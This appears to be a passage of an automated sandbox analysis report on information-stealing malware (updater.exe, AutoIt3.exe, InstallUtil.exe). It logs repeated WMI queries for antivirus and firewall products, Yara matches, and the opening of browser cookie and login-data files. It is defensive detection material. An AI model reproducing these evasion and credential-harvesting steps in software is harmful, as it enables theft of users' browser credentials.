                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004A0030 GetLocalTime,__swprintf,11_2_004A0030
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004A0722 GetUserNameW,11_2_004A0722
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0049416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_0049416A
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00475D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00475D13
                    Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2230558308.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2351472227.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2233978914.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2432130192.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000003.2351600972.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2230437653.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000003.2428369373.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 3780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 7128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 1684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3580, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: AutoIt3.exeBinary or memory string: WIN_81
                    Source: AutoIt3.exeBinary or memory string: WIN_XP
                    Source: AutoIt3.exeBinary or memory string: WIN_XPe
                    Source: AutoIt3.exeBinary or memory string: WIN_VISTA
                    Source: AutoIt3.exeBinary or memory string: WIN_7
                    Source: AutoIt3.exeBinary or memory string: WIN_8
                    Source: AutoIt3.exe, 00000010.00000000.2422373901.0000000000A36000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
